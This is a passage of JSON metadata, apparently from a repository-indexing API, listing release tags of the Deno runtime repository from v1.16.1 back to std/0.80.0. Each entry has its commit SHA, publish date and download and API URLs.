d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"d